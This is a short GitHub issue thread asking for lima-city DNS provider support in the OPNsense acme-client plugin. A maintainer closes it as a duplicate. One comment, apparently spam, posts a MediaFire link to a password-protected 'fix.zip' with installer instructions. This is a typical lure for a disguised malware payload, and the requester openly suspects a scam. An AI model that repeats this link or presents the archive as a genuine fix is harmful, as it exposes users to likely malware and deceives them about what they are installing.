### ISSUE TITLE
os-acme-client / acme.sh -- Add support for lima-city provider

### ISSUE THREAD

**Issue by feroxib** [opnsense/plugins#4200] opened 2024-08-26 14:29 UTC
**Important notices**
Before you add a new report, we ask you kindly to acknowledge the following:

- [X] I have read the contributing guide lines at https://github.com/opnsense/plugins/blob/master/CONTRIBUTING.md
- [X] I have searched the existing issues, open and closed, and I'm convinced that mine is new.
- [X] When the request is meant for an existing plugin, I've added its name to the title.

**Is your feature request related to a problem? Please describe.**

**Describe the solution you'd like**
(e.g. I would like an input field in the `/ui/firewall/alias` which would add .... to ....)

Please add support of lima-city provider to acme-client plugin as its supported by acme.sh already.

https://github.com/acmesh-official/acme.sh/blob/master/dnsapi/dns_limacity.sh

**Describe alternatives you've considered**

**Additional context**

**Comment by xiaobai-marker** [comment] 2024-08-26 14:30
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by feroxib** [comment] 2024-08-26 14:33
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

for what purpose?

are you a bot? because this sounds a lot like scam. 

else please provide more insight to why i should do whats described

**Comment by fraenki** [comment] 2024-09-11 09:10
Duplicate of https://github.com/opnsense/plugins/pull/3566.

**Closed by fraenki** 2024-09-11 09:10 UTC
